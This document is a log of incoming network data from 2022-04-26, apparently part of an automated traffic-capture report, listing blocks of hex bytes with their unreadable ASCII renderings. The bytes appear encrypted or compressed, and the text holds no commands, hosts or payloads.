                                                                              2022-04-26 19:08:56 UTC1003INData Raw: 47 53 f1 aa a4 4c 78 f8 ac ab a9 70 01 2b 1a b0 ed c3 b7 ec 2a 1f ba 18 9e d6 92 f2 d4 dc e9 78 8b db 81 27 f5 09 44 f7 b0 f3 5a 00 8d e5 7f 5c 4a 54 88 23 8c b4 b9 cf 1e e1 ae 9a 08 d9 e2 9e a3 d5 89 52 ff 9a 60 7e 7f 91 20 83 05 f6 65 d2 86 bc ad 60 4a e8 2e 3e 2f 78 de b3 1e 34 46 12 f5 46 e7 34 1b a5 52 3c 08 d9 b4 90 41 03 45 ef 5e 56 9b 84 33 4a eb f5 03 fe eb 35 08 eb 49 9c 4c e6 56 89 bf b6 47 a0 c2 c7 ea a1 9f 13 cc ee 41 7c 50 85 d4 09 c5 a0 78 93 cf 8e 7b fa 1b 55 7b 3d 0a 80 e2 4c 6a 27 95 7f 51 09 ae 98 2e fd b4 73 85 02 28 98 11 7b 9c a0 11 f3 bb f4 d6 6e 91 bd b3 68 79 a2 d9 1f 30 b7 78 36 8b 82 c6 30 69 ce 97 97 18 92 34 4b f1 41 b7 6a c0 9a 02 e9 1d f3 e6 6b 7b b7 58 4b ab f2 bc 21 27 ac 1a 3a 7b ff 46 62 ae f8 71 a4 1d 72 2d f4 34 5a a8
                                                                              Data Ascii: GSLxp+*x'DZ\JT#R`~ e`J.>/x4FF4R<AE^V3J5ILVGA|Px{U{=Lj'Q.s({nhy0x60i4KAjk{XK!':{Fbqr-4Z
                                                                              2022-04-26 19:08:56 UTC1019INData Raw: 68 41 9c e0 3d 2f ca 9c b6 76 17 cd e4 99 33 59 14 c8 41 0e cb 25 f7 2d 23 eb 35 ce 31 08 3b 54 0d 3b 47 d9 69 21 a6 54 92 b6 aa 23 6a ee 1b c2 a5 52 a6 8c e6 7a 1c 4c d0 de ce 3f e8 05 24 c8 62 11 2a 6d 2d 7d 44 6d 6e f6 52 bb 7a 0a 00 07 1d c9 b3 28 59 36 69 c9 56 b8 2e 78 2b 99 da 65 25 37 c7 07 d0 76 ed f2 bd 3a d5 4b dc 0d 63 e2 2a 45 08 d7 16 ce 05 f4 c2 22 90 e8 93 ca 1d 44 f9 e2 61 76 5e 51 15 4e dd e0 1f 3d 4b c2 d3 53 2f c1 a8 7b b9 83 6a c8 64 2a 47 26 e4 09 61 28 a8 e4 c4 bd 6b bb f0 90 6c 06 33 ab 31 1c aa 6b 39 31 75 ad 48 bd 00 09 06 02 87 96 f8 36 f6 df dc 7d af 77 13 8a 44 6b c3 29 d9 17 36 05 0f 42 5b a2 cb da 10 5d fa 3e 8f d3 6f 6d e2 2b 1d 93 ec 1e 0c 46 fd 16 a9 44 e6 07 0b a7 19 d7 71 81 93 22 06 c4 fc 43 67 4a 29 4b 27 ee 81 91 0d
                                                                              Data Ascii: hA=/v3YA%-#51;T;Gi!T#jRzL?$b*m-}DmnRz(Y6iV.x+e%7v:Kc*E"Dav^QN=KS/{jd*G&a(kl31k91uH6}wDk)6B[]>om+FDq"CgJ)K'
                                                                              2022-04-26 19:08:56 UTC1035INData Raw: 5c 3e 77 7d e8 4e 96 08 00 3e 1e 72 80 f4 71 27 bc fd 80 10 7c e5 80 27 df 9c 8f 1b 1c ee 0a b3 cc 2a dc 79 57 ff 7a 53 e2 6c 22 83 37 90 6d d3 91 f8 1c ae 90 ab 99 31 55 b4 c0 41 a0 e6 af fe 86 c3 9e 06 a8 46 8f 58 3d c2 ac b3 4c 69 58 99 e3 fc a2 8c 72 55 e9 8b 61 02 7e e1 9b 0a ea 3d d4 58 5e 56 4d 14 c7 5c 08 48 6e 28 c5 75 29 b6 ae 77 3c 91 da 10 52 9a 7b 4a ae ed 46 f3 ab 68 64 5c 86 8f 96 96 a8 ef 50 c5 3e 84 3a 62 a7 8f f9 e8 52 86 1a f7 f0 44 4d 7b 5e f9 d3 d1 54 05 fa 1a 21 66 0e 07 62 6b ce 15 5a 07 ec 70 4e 9d a3 6c 26 81 f8 98 54 e7 da 6b 48 8c db 1e 80 e4 72 78 70 91 46 b0 bf 0f 6b fc dc e6 71 78 28 fd 90 02 0d ab af a1 84 f7 cc 3e f1 c6 2e 5f d3 50 09 59 32 f6 e1 77 85 96 0d 6c a4 0f df 19 4e ae b1 48 43 2c 0c 23 69 09 8f 2a 0c 52 f6 d3 7c
                                                                              Data Ascii: \>w}N>rq'|'*yWzSl"7m1UAFX=LiXrUa~=X^VM\Hn(u)w<R{JFhd\P>:bRDM{^T!fbkZpNl&TkHrxpFkqx(>._PY2wlNHC,#i*R|
                                                                              2022-04-26 19:08:56 UTC1051INData Raw: 9e 03 59 6d 46 db da 8d 66 46 0d 5f 07 57 96 8e cc 66 80 49 ab da c9 fa fd 2e c9 f0 3f 62 b8 ba a6 d8 98 f8 a1 90 5c 9d 50 c7 64 f3 60 b5 5a 59 72 83 ff 52 63 5a e2 43 85 7f 9c 97 3c 5f 4e 6e 70 dc 1c 6f ba d2 d5 3e 5e 14 d2 71 89 bf a3 9a 72 66 8a 75 3b e0 99 a3 db ba 8b 3c 9a 4d 05 f9 8c 74 28 2c ed e3 bb 24 0d fd 48 79 0d 46 5c d4 d4 5e 48 47 e9 41 31 e6 c9 c7 4b ea 61 cd e2 f9 d4 50 b7 c5 21 39 c4 99 7d b2 6e 06 0f 73 72 28 f3 14 cd 72 b3 a8 fa 33 d6 bf 5d 60 50 eb 0b 50 7a 97 94 98 22 1f 37 db 67 0e 02 5c de b9 ef 3a 3e ec f8 06 86 fc b4 bf 0d bc 67 f5 71 f5 5f 5b 84 d3 0a 5f 88 23 2d 86 d6 c9 c1 ac 56 e4 5c 8f b6 4c db cb c2 da a4 37 42 a4 26 17 61 c5 89 66 0a 68 67 0f bd cc 59 35 38 2c 73 ff 9e d7 3a 92 99 56 50 da 2d c9 7a 2d da fd 6a 72 8a 34 f5
                                                                              Data Ascii: YmFfF_WfI.?b\Pd`ZYrRcZC<_Nnpo>^qrfu;<Mt(,$HyF\^HGA1KaP!9}nsr(r3]`PPz"7g\:>gq_[_#-V\L7B&afhgY58,s:VP-z-jr4
                                                                              2022-04-26 19:08:56 UTC1067INData Raw: e0 78 ae bc 11 25 12 33 02 0a 37 e8 d0 92 3a 79 c5 7e 7f 4f 8d 15 cf d4 27 80 35 05 4c 56 f0 2a a6 9f 61 d5 c7 b1 2c a8 53 89 db 32 5d 94 30 b2 f1 4c 2e 49 4f 86 1e 10 19 f4 5d 76 0a 39 f7 1e 4e 14 0c 51 7e 3c 7e c2 4b 1c b2 d3 2e de fa f0 f9 20 db 39 71 58 b5 32 eb 68 af 49 a9 9a 5a 9a 75 65 55 76 4d ca 45 d0 11 c6 bc 9f 25 7c 86 f0 62 8e 02 39 26 10 fe 2a 93 75 c3 36 b6 72 c2 f3 20 d6 c2 db e6 56 4e b0 f1 74 64 98 e8 e6 88 2a fe f5 69 29 16 fe d5 eb 3d 6f 60 66 d8 09 bf 44 ef fb 17 7e cf 1a a2 d5 9d 49 5f b0 d8 f4 7f 7f 9f 60 34 06 42 46 84 97 2d d5 04 23 c6 d1 77 81 1d 6d b6 5e c8 db 72 0a 52 71 d8 95 b1 00 0a a9 42 15 bd c9 4b 7c 02 c7 54 e5 ae f7 b8 37 03 08 07 25 1b 9f 25 84 4c 7d 80 65 e6 10 c3 80 0d c4 31 2f ec 2c 14 ec 20 f3 c9 dc f5 e0 5f 88 5b
                                                                              Data Ascii: x%37:y~O'5LV*a,S2]0L.IO]v9NQ~<~K. 9qX2hIZueUvME%|b9&*u6r VNtd*i)=o`fD~I_`4BF-#wm^rRqBK|T7%%L}e1/, _[
                                                                              2022-04-26 19:08:56 UTC1083INData Raw: 31 7c d9 d1 b7 af 28 51 ee 41 30 25 b5 f4 86 9f 5f e4 0f b9 af 62 42 8e e3 83 7d c5 9e e0 35 78 ee e5 ae 6b be ae 84 64 3f a1 44 6a 0e 20 ac bf 97 e7 ed 9b bc bd a1 63 d5 86 e6 41 ce 41 50 e6 78 85 f0 90 2e 5c 63 f9 dd 19 b9 74 8a 13 54 6c 1c 45 78 b3 af 7d 91 91 0f 44 31 a8 67 fc a8 95 cb 4c 8d df 9c 45 03 f3 69 5e e5 dd 30 25 3a 99 11 67 00 8d 0f aa 10 a9 a9 5e 35 98 3d fd 11 8c fd bb e2 b2 58 61 2e fd da e6 eb a0 69 69 5e 26 7c 75 dd ce 49 d0 ce 84 08 fb 30 ca 41 cc fd 8f 21 79 13 1b 89 0f 43 47 ad 3b 40 b5 c7 3b e8 1b 66 c3 af 20 78 8c 91 89 10 ad de 56 2c 88 72 bc 7d c5 65 cb 30 17 69 c1 25 01 21 49 9e 9d 48 fc 30 20 08 0a 87 ca 32 e8 69 bd f1 e7 6e 51 4c 92 a0 79 dc 40 4a cd 1f 1c 89 27 d9 72 e2 a0 8d e0 48 20 30 94 4b 58 c7 f2 6a ba 1e 76 48 c0 7b
                                                                              Data Ascii: 1|(QA0%_bB}5xkd?Dj cAAPx.\ctTlEx}D1gLEi^0%:g^5=Xa.ii^&|uI0A!yCG;@;f xV,r}e0i%!IH0 2inQLy@J'rH 0KXjvH{
                                                                              2022-04-26 19:08:56 UTC1099INData Raw: 4b 4e ea fe 43 fa 67 55 0b b5 54 23 74 ae c9 e4 3c 95 73 b5 1d b9 cd 83 18 d7 21 e0 2c dc 4e 37 9f c0 e4 5d a8 d5 5b 71 b0 0c 02 f5 28 84 09 92 05 4d 09 41 b0 1b f8 43 28 e7 cc b4 0e 93 70 1c f8 d2 25 47 6f 4c bb ee fe a8 a5 5e 53 bf 7c c0 d9 92 55 87 d6 a4 2f 8f a8 9b 14 3f 11 78 a3 7a 1a 86 97 6a d3 77 98 9e 82 ce 10 1f a6 47 e6 63 0e 8f b4 32 19 ff d7 08 f4 bf 6b 9b 68 fe 16 d7 83 77 dd df 4a ff c7 1c d4 86 d6 29 86 eb e9 d3 20 30 cf cd 03 2d a9 d6 28 30 82 92 e0 6a 38 6f 45 c5 97 ac 54 0a cb 69 ac 7f 54 9c 0e f5 69 d6 af c5 d0 df 67 81 a5 b2 3c e6 bc a6 5c 60 de b0 cf 28 01 b2 78 67 84 76 ec 13 90 45 d9 8e 20 3f b3 47 bc db 60 29 35 bf de 8a 88 c3 d4 22 28 b2 10 83 98 bf a6 1d 76 49 4c 5f b2 77 5f ef 4c 1f 99 13 e3 ea 11 f4 ce fb f6 05 30 94 55 fd d4
                                                                              Data Ascii: KNCgUT#t<s!,N7][q(MAC(p%GoL^S|U/?xzjwGc2khwJ) 0-(0j8oETiTig<\`(xgvE ?G`)5"(vIL_w_L0U
                                                                              2022-04-26 19:08:56 UTC1115INData Raw: 5c 1e 99 6f b3 14 8a 13 a8 e7 a8 bb 79 fc 4a 40 fc 50 20 84 76 c9 1d 7b 92 a2 a8 1f a2 0f 2a 4d e7 4c 9a 4e 61 72 41 9f 99 1f 80 ee ee 38 bd 15 bb 32 e6 b2 57 68 7b 5d f4 f4 27 17 d2 87 35 47 54 4f 32 2b 24 65 37 a9 0e 3a 46 f0 28 d1 b0 46 66 64 d7 b3 ce fe a7 c6 2f 33 80 ca c1 13 47 47 23 59 06 3a 76 2e ae 63 3c 4f bd 3e 87 53 98 2d 86 d1 67 4e e9 34 08 14 17 4d f8 97 59 7e f4 db 65 52 b0 44 27 4d 31 3c e1 a2 ca 2e d6 b2 c4 d8 e6 9e 09 c2 ce 9a 8c 59 82 e3 14 98 6b ad da 9e 30 8b 86 2a 3a 1c c6 fe 1d 00 19 74 56 33 98 59 fc 29 37 98 14 0e 6b 80 4c 4d 84 e4 24 be 1d fb 0b f6 23 33 c3 17 c8 86 18 a6 5a bb c8 cf 27 01 5e 22 7e 23 c6 b1 b2 e4 31 cd 8e 2a 6b ee 9c 18 08 f1 b9 f9 4a 4f 8d 35 09 b9 f8 a3 47 ca 6b 59 0c 58 93 66 85 82 f6 30 62 af 4b 9f 34 82 a0
                                                                              Data Ascii: \oyJ@P v{*MLNarA82Wh{]'5GTO2+$e7:F(Ffd/3GG#Y:v.c<O>S-gN4MY~eRD'M1<.Yk0*:tV3Y)7kLM$#3Z'^"~#1*kJO5GkYXf0bK4
                                                                              2022-04-26 19:08:56 UTC1131INData Raw: d6 18 75 0c b2 e5 00 34 96 47 7e 64 d0 e3 43 12 4f d1 3b fe 9a ba 93 28 8f 48 56 4d 1d cc d1 3f 14 c3 ba 4f a7 cb a7 c3 64 a4 a8 05 47 f3 35 20 30 87 14 00 8e a5 8b 03 0a 1a f9 4d 8f af 80 fa 2d 45 3a ee 3a ae c6 9b 57 17 e1 45 33 84 13 a9 67 69 b0 58 79 0e c1 74 52 f4 e4 76 72 af ad e1 be 1e 8d 48 09 ca 8e e7 a8 28 6f 3c c1 37 9c 24 66 2e 1f 73 85 38 4b 83 01 e2 66 ac d0 9f 9c 94 02 17 4d f6 d8 b4 1c 8a 76 82 40 f2 ea 1c 6f bb e4 25 42 69 e1 ac 23 90 b6 0d d5 71 6e a8 96 4c c3 2b 45 28 63 17 dc be fe 14 60 95 13 83 af fc 8f 2f 08 6f f6 02 54 49 be 20 9f 99 bc 87 4f 4b 36 4f a2 60 b8 08 00 5d de 3f 43 99 4a 6f 77 f2 01 c2 ef 0c 72 9e 1d 71 22 f2 ab 9f 33 1f 5d 42 cf 2d c1 bf 26 29 35 4d f1 1b 57 5d 34 49 51 26 08 29 c8 f1 b2 86 74 78 11 af 33 a4 86 b5 4f
                                                                              Data Ascii: u4G~dCO;(HVM?OdG5 0M-E::WE3giXytRvrH(o<7$f.s8KfMv@o%Bi#qnL+E(c`/oTI OK6O`]?CJowrq"3]B-&)5MW]4IQ&)tx3O
                                                                              2022-04-26 19:08:56 UTC1147INData Raw: eb 02 9b 2d 29 03 f8 78 26 3e 25 ed 04 42 6c 49 1d ec 9b 38 4a 47 05 17 ee f9 e6 87 34 93 6a 10 77 a3 f9 1a 0d a5 a1 ee eb 80 ae e0 87 ed 05 b3 91 7f b9 19 49 be 92 f6 4b 3d b4 17 0a 4f fa c9 d6 f5 4b 4d a8 83 b7 97 bb 07 db 6f 16 39 af 7e 5e 1e e2 ba c4 de c9 c2 d9 df 82 0c 1d 40 91 29 6c 64 c5 06 51 80 bd d2 12 8b 17 3a ae e9 ea cf 46 a5 96 ff e1 14 b7 57 94 5e be fb 78 4b 4d a5 83 6c bb 5b 37 29 d8 4f f6 c0 25 ab e3 e6 9e ae 85 72 ed 3e 94 de 84 1e 57 29 26 a9 0d 18 06 64 24 3a 0b 8d 1f 5f 84 ad 88 d5 ea 4f f9 d8 88 1e 56 32 10 3b e6 e3 08 9e 5b 4d 64 92 1b cc 2a 0c af d9 16 b0 19 e4 fd 7c cd f0 49 19 65 b3 cd 80 60 4d f3 04 e3 dc db ac 01 fa 45 dd ff 37 4f 9a 35 89 94 35 c0 80 b2 53 fc 18 5c ea b2 0d 99 17 4f 5a c0 4c ce 7b e6 79 10 cb 9c be 2a 9b c8
                                                                              Data Ascii: -)x&>%BlI8JG4jwIK=OKMo9~^@)ldQ:FW^xKMl[7)O%r>W)&d$:_OV2;[Md*|Ie`ME7O55S\OZL{y*
                                                                              2022-04-26 19:08:56 UTC1151INData Raw: 96 c1 aa e0 1a b6 1c 9d 08 1e a9 af 71 f0 d0 5b b3 21 c0 e6 76 c8 e6 3b 87 72 9c 86 ff 16 ed 51 38 9f 44 23 93 be ca 8b 9b a2 c9 1a 08 38 ff ea cc 98 be e8 41 fa c0 61 dd 72 10 4a fe ed 0a e8 24 f4 0a 93 2a d4 55 49 61 19 a3 de 67 4b 19 66 1c cf 4d 83 55 51 0d 65 5a 44 6c 63 e4 5c 74 3e d6 6b 26 f4 bf 67 35 f3 38 8b ab e3 0b dd 13 64 37 cf c5 84 27 4e 5d 9f cf 3f 3b 0e c2 a5 1a 1a de 65 26 5b 05 52 96 0b d5 0a 51 34 76 53 9a 24 9b fe 6d 9f 2f 45 66 a3 2a a4 46 a0 74 25 fb ab d6 3c 2d db bc 22 18 fb 4c 78 62 07 85 8c df 91 0c 36 8d 82 72 63 9c fb 7e 59 97 27 fa 0c 45 4f 80 c5 27 7b a5 d8 7b 3e f5 83 03 80 6a 1f 76 97 9a 40 d2 0a 80 1e 55 de 5c e5 86 66 51 87 5f 59 d1 7d f9 ca 4d bb e8 38 bf a4 26 9a 23 3d f4 81 4e f4 b9 7e 61 25 49 a2 43 26 6b c6 06 10 14
                                                                              Data Ascii: q[!v;rQ8D#8AarJ$*UIagKfMUQeZDlc\t>k&g58d7'N]?;e&[RQ4vS$m/Ef*Ft%<-"Lxb6rc~Y'EO'{{>jv@U\fQ_Y}M8&#=N~a%IC&k
                                                                              2022-04-26 19:08:56 UTC1167INData Raw: 39 47 42 9d ac 45 a2 09 c7 c1 bb 5c db d5 f8 25 8b 38 4e 63 65 f1 41 a9 7c f8 c1 92 30 c9 ac d7 98 8f 65 b7 5f df 0e 98 df cd 2d 66 6c b0 dc 6b 84 30 46 9e 70 cb c0 5e 26 b5 25 9c 8e aa a7 41 71 f5 a5 44 e5 3b 05 35 86 11 74 89 39 7e f8 87 ca 2d fd 5f d3 58 f7 ef ae a8 4d 4f b2 f6 42 1e ec e1 99 a7 f7 58 45 78 f7 30 e2 de 10 d8 e4 b2 d6 4a 2e ef c8 03 e9 0f d2 79 83 1b 84 5a b4 e1 6a 05 9d 6e ba 83 80 67 5a 9b ea ac d0 9b 43 a4 1a f9 df 8d e9 fa fa 44 13 ce bd 3b 02 bf da 48 0c a9 06 74 0a 54 c7 c4 0a cb 59 52 f2 cd f3 4e 18 1d a6 59 d2 e8 86 4d 65 c1 b6 a6 45 38 ad 05 ee dc f3 09 62 9b 0b fe 70 02 bd 85 28 1f 1e bc be 57 33 34 0c 37 87 ff a9 9d bb 88 f3 04 c4 73 f0 33 ed 33 16 1b 98 92 9f 81 f9 68 d4 59 f2 1a 2d 02 88 e0 45 18 fa e2 0b 31 5f 46 95 56 79
                                                                              Data Ascii: 9GBE\%8NceA|0e_-flk0Fp^&%AqD;5t9~-_XMOBXEx0J.yZjngZCD;HtTYRNYMeE8bp(W347s33hY-E1_FVy
                                                                              2022-04-26 19:08:56 UTC1183INData Raw: ac a1 55 b4 06 d5 34 ee 30 97 ba 42 55 35 b1 b0 87 45 4c bf f7 9a a6 3c 3f 47 61 90 21 83 2f 74 6c 05 3a 5e b5 34 88 58 22 22 9d 20 1e a7 c6 78 c7 24 ae 43 f6 76 eb 19 1c 51 45 93 9a 42 b4 48 39 01 56 e0 74 29 fa b7 ae 4a 9b 92 3b 41 88 7d b4 7f 10 3f 46 0e 56 65 e5 01 f5 8b 55 d4 0f 51 ab 91 de 2a 0a b9 d3 5c 10 3d 2a f9 94 4f 09 8a db 9d f0 61 59 15 27 45 e4 52 4a cd d9 fb 74 06 c5 98 ff 97 d5 58 69 3b 07 76 27 4d 43 50 75 0f 94 2b 37 0a 77 4f b8 97 c8 6e d3 60 ec 6e 3b 07 13 63 d5 6c e1 6e 2b 29 83 da ab e3 54 46 0e 2b c4 a5 99 e8 50 7e 4d aa 86 b0 99 ee e3 6b c6 c8 d0 12 81 45 40 ba 0c df 84 17 ca 19 d1 ad 44 da 84 0c 7d 6f b4 82 ed ff b2 e3 45 97 fa 6c 6c b7 fb 5a da e2 fa af 0f 6a fa ba 40 c4 60 a8 3e 65 04 8e c7 7c 36 98 f7 04 cb 27 11 97 3e 1b 5d
                                                                              Data Ascii: U40BU5EL<?Ga!/tl:^4X"" x$CvQEBH9Vt)J;A}?FVeUQ*\=*OaY'ERJtXi;v'MCPu+7wOn`n;cln+)TF+P~MkE@D}oEllZj@`>e|6'>]
                                                                              2022-04-26 19:08:56 UTC1199INData Raw: 74 e8 1b 10 a6 7c df 06 14 4a 0b 93 65 d7 c0 1b 1d b5 76 a6 6c bf 2c 2f 10 a9 3b 36 dc 0a 6e 23 1f 02 70 73 19 8c 15 da 51 49 d7 07 11 e9 19 31 44 36 cb 07 f4 dc 67 24 f3 55 ea cf cb f8 a6 17 93 f5 7b 11 fa fd 24 7a c8 59 77 b2 b6 49 59 bc 89 75 5e 15 7d fc ae e2 99 58 2a be b2 55 11 94 c4 fe 21 ec d3 9b 47 98 13 ca 09 f9 dd 98 67 6f 1a 6e 30 49 ac 66 9b 21 9f bd 76 4a 05 b5 3c 2a 16 e3 db b1 09 12 c4 58 31 f0 eb be 6d 44 c4 d5 ee b9 e3 fa c2 64 d7 61 36 dc 6a a0 d8 2c cc a4 29 0d fa be 57 fa 36 3a 3c 84 59 20 47 00 84 cd 78 d8 db cd 37 8c 82 ee 2d 95 58 31 58 d3 d2 b5 6b 33 d5 3d 7b 4e 8a 14 4b f0 49 cd da 05 ee 36 c3 ab af 4e f5 a4 d1 73 b7 79 12 9a 1a b3 f9 6c ac f1 c0 8a 44 14 4a 40 27 9c 6a 23 ec 71 b8 14 a3 b0 63 bb d4 d0 2b 88 71 b8 ab 12 da c0 cd
                                                                              Data Ascii: t|Jevl,/;6n#psQI1D6g$U{$zYwIYu^}X*U!Ggon0If!vJ<*X1mDda6j,)W6:<Y Gx7-X1Xk3={NKI6NsylDJ@'j#qc+q
                                                                              2022-04-26 19:08:56 UTC1215INData Raw: 77 f7 1b d1 c3 5a b1 df 4c 0f a6 bd 65 50 c8 44 18 b7 14 d0 8b c3 4c b5 d8 35 3f d3 a4 3f 6f 6a 48 87 f2 a2 55 f3 da 58 e6 de 79 20 e0 18 0d 91 62 95 14 be d1 ab 77 4b 55 ef 24 97 fc 02 43 66 34 51 35 61 14 f4 eb 04 cf d9 fd 1e 3a da 0a ac f8 75 33 87 6f f9 6d a0 5e c3 f7 bd 83 fc c7 42 5a 0d 2b fb 48 70 cc 37 10 dd a6 bd 21 28 7b af e8 97 91 d3 44 24 bb 47 3b e2 36 2f 01 e9 1e 49 bd 06 8c aa 3f 93 9f 5e cc ba 50 86 ff 6b cc 58 b7 a5 ed f8 a4 72 25 7b 06 cd 13 9e 81 5f 74 96 ad 96 ee 8f bb 32 38 7f a8 0f 79 6f 8f 5d 16 da 1a 56 24 a5 f9 f8 c7 06 37 17 44 34 cc f5 01 80 0e c5 a5 d0 59 ca a5 24 dc 13 a8 2f 6f f3 7b ae f2 89 30 bd dd 7e 93 e1 e7 c9 6b 7b de 48 31 1b 5b b2 18 bb 75 f0 7a a9 4b 2e ac c5 1d 73 61 5c 51 29 a9 a0 1f 73 23 2a 8d 02 3f 22 c1 44 f2
                                                                              Data Ascii: wZLePDL5??ojHUXy bwKU$Cf4Q5a:u3om^BZ+Hp7!({D$G;6/I?^PkXr%{_t28yo]V$7D4Y$/o{0~k{H1[uzK.sa\Q)s#*?"D
                                                                              2022-04-26 19:08:56 UTC1231INData Raw: 97 b9 7e 22 ae 52 ab 83 cc 08 41 30 74 af ac 3f 8d 03 ad 45 5e bc b2 32 39 d2 5e 01 84 f8 46 88 cb ff 46 b5 17 79 b9 12 91 09 87 fd 37 45 9d fd 72 43 a2 25 49 a9 ee 59 80 21 e1 84 d3 75 ff 09 be 13 14 b0 f9 dc b0 df bb ef 2f 90 30 ae 5b 7d 28 d8 f1 1c d2 d6 32 d3 43 27 49 fe e1 76 bc f4 e5 cd 6c 0d f5 78 07 81 a8 5a 09 fb c9 e8 6a 8a 04 ea c9 1e d2 5c 0e ec 23 51 4e f0 56 e6 01 55 f0 f4 c3 14 b7 53 d3 c0 7a 79 6b 0d 60 ef d7 82 4f d1 bc 16 c9 43 0a 6b cd b3 d8 79 6d 86 64 ed f8 42 84 a9 77 7d 8f 5c 56 b3 de 5c da 64 e6 11 9b 23 31 19 2d eb 9e 74 ca 2f 28 bb 2d 4b 77 19 38 0b 93 36 69 53 c7 de 0d c8 b0 87 3d fd e1 a8 53 08 b4 1d 0c 44 a8 96 4a f5 88 89 c3 9a 3c 41 18 4f 64 50 0b 8a ff fc 99 57 a1 cc e2 24 8c ed 40 83 36 10 64 d6 71 c7 27 69 e7 7b 5b 31 c7
                                                                              Data Ascii: ~"RA0t?E^29^FFy7ErC%IY!u/0[}(2C'IvlxZj\#QNVUSzyk`OCkymdBw}\V\d#1-t/(-Kw86iS=SDJ<AOdPW$@6dq'i{[1
                                                                              2022-04-26 19:08:56 UTC1247INData Raw: 94 5c 04 e3 f3 9c 22 20 bd 56 0b 4e 3e 95 a5 9f 0e 8f b7 44 d6 64 87 fb 42 0c a4 b6 f2 c2 ac c8 f6 4d 1f 44 10 0e 30 f5 38 d0 f0 20 e4 05 ab 77 a8 eb 5e cb 70 3b df 41 69 b3 cc 78 0e 64 8f 8a 35 a0 c0 17 1e 06 6d 8e c8 59 fe 09 75 2d 94 a4 12 5d 50 fd 30 9d 7e 72 8d 4d 18 90 c6 86 ee e6 7b bf 6d f4 dc 63 89 b3 30 b9 78 e1 0d c6 91 be 66 43 ab ea 2f 9c 70 96 0b 03 62 36 18 4b 70 63 ac 60 58 60 22 22 ad 7e 4a 7a 5d 46 d6 a5 44 a1 49 f6 0b b3 ca 89 e9 ba 42 cc f5 c1 f4 33 57 fd 20 17 57 da 5e 4f 5d b8 27 18 03 98 7c 17 3d ef 4e 3f 78 2f a5 a0 1f ae a0 ab f0 11 c9 b0 08 bf f5 81 8c 21 9c 24 76 b0 dc f5 8f 47 db e2 03 36 81 7e 2c 17 29 d5 1a bb 07 7c d8 15 36 d0 50 ad 4a 71 69 2f 72 7f c2 1b ee eb 7f f5 cb 4d d7 45 51 55 f5 9d d1 a6 ff 61 72 f6 7b 69 c8 4b 8a
                                                                              Data Ascii: \" VN>DdBMD08 w^p;Aixd5mYu-]P0~rM{mc0xfC/pb6Kpc`X`""~Jz]FDIB3W W^O]'|=N?x/!$vG6~,)|6PJqi/rMEQUar{iK
                                                                              2022-04-26 19:08:56 UTC1263INData Raw: f6 d3 94 8b 53 9c 5a 8e 0b 39 4d 83 1b 71 a6 fc a0 fc 35 c3 1a c5 ce 0c b8 87 a9 94 a4 f1 2f 35 56 98 7d f0 d4 17 24 b7 0f e5 dd d9 6b 77 5e de 02 ed 99 6d a2 3a 22 9c a4 12 01 d4 0b c5 14 e2 fe 02 ca 99 da fd be 8e 13 b6 7b 9f 26 f5 d6 26 7b f6 0c 2b 67 1d 2a 4b b3 dc 14 18 a7 03 87 39 bd 60 12 53 29 ba 09 a3 fd b6 7c 96 1c be c5 f6 1d cc f7 6f ee 93 45 b0 40 12 6e 21 8e be 11 db 9e 6a 4d ec 50 9a b0 5e 68 98 0f eb bf 7c 60 9c 4c 10 3f ad 8e f8 39 d8 69 58 e7 21 dc 0b 83 14 8b 90 a5 e5 e4 4b 09 4e 3b 63 48 67 2d 8e e5 64 76 3a 73 d4 87 09 ed ef a5 66 e1 1a 52 70 96 7b 1b 95 99 dd a5 fc f3 01 e7 12 33 5f f5 e2 ad 4a 1a a9 9b 63 67 c6 e0 8e 1d 61 b3 66 56 0d 52 fb f8 ed 0a 65 e0 71 1a 34 d3 9b 84 b8 87 e0 38 4a e3 4f 12 b5 07 50 cb 7b bb 2f fa 85 4e 15 68
                                                                              Data Ascii: SZ9Mq5/5V}$kw^m:"{&&{+g*K9`S)|oE@n!jMP^h|`L?9iX!KN;cHg-dv:sfRp{3_JcgafVReq48JOP{/Nh
                                                                              2022-04-26 19:08:56 UTC1279INData Raw: 02 a3 09 1f 15 96 95 f5 f5 1f e6 f0 f5 99 b3 a6 b4 b0 62 b0 ed 19 f9 2f bc 52 92 f7 94 d2 6f af ad 9c 65 31 24 a8 42 94 df e4 21 7c d6 b8 22 90 cc d0 f7 aa d2 f7 42 87 80 d1 d0 c4 59 cb 67 cd 79 12 70 8f e7 7e d0 3c fd 83 02 79 70 58 d1 31 b7 16 ab 89 e0 96 ec f8 28 ec 9c 28 28 fb e7 21 31 a7 bd d7 ee 24 a4 27 37 56 3e f9 d1 39 54 75 df cf df 9e be b6 40 e2 c3 52 45 c2 fa c0 5e bb dc d4 66 a4 db 16 d5 6e 2a e0 bb 03 88 0a 0d 34 3f b5 33 1e f9 93 7e 14 b5 c4 ab c2 c8 1d 36 b9 25 83 86 65 1e 44 74 60 59 47 25 36 fe 29 08 48 57 f5 ca 1d 3e e5 77 ee d0 7d 23 20 4f ac 11 39 3e 6e 1f 51 1f 5a a3 e5 0f 38 6f 30 bf af df 10 a7 c5 7d 5b 08 72 f1 54 4d 46 47 b0 0f 19 51 27 e9 05 02 f5 ec 2f 64 2c 61 17 37 7d da 14 9f b3 68 62 09 9f a1 97 9e 81 f6 e9 5e 49 5f c5 c2
                                                                              Data Ascii: b/Roe1$B!|"BYgyp~<ypX1(((!1$'7V>9Tu@RE^fn*4?3~6%eDt`YG%6)HW>w}# O9>nQZ8o0}[rTMFGQ'/d,a7}hb^I_
                                                                              2022-04-26 19:08:56 UTC1295INData Raw: 3f b0 3b ca d6 92 f6 3e 3d fe a2 10 8d a1 5a 90 c7 89 e4 2b 7a 21 4d a8 aa cb cd 44 2e 87 62 5a 65 73 1e 35 44 72 37 18 27 da 87 76 2b 06 a0 aa 8d 08 c5 21 2c bb 9f 53 6a 61 b3 69 f6 2a 9d ec 3e 32 71 5f 35 99 45 4c 87 3c a8 8d ff d4 3f fd 3e a1 1e 5b 96 7b d7 ce 84 6a e0 ed 61 cf bf 12 94 b3 28 e0 e3 6b 72 e3 e6 3c 3f 47 e9 3e 66 0b 2a c8 cc 19 1b ac 0e 23 16 f2 18 2e 8c cc b3 14 60 88 bd dc 7d 4b a4 e1 bc fe 08 84 61 8c 41 a0 e6 1b 0e 29 ca 5c d3 03 a4 f6 ed 84 44 0f cc bb 01 b3 04 14 05 2a 91 6d bf ef 91 f9 b7 fe c7 0b 09 d3 46 e8 43 46 6b a3 ff b7 ba a3 58 6d ae c3 1b f8 ef 07 01 3e ac aa f0 21 a3 0d ff 59 25 92 5f fe a1 61 32 fd 14 99 b7 53 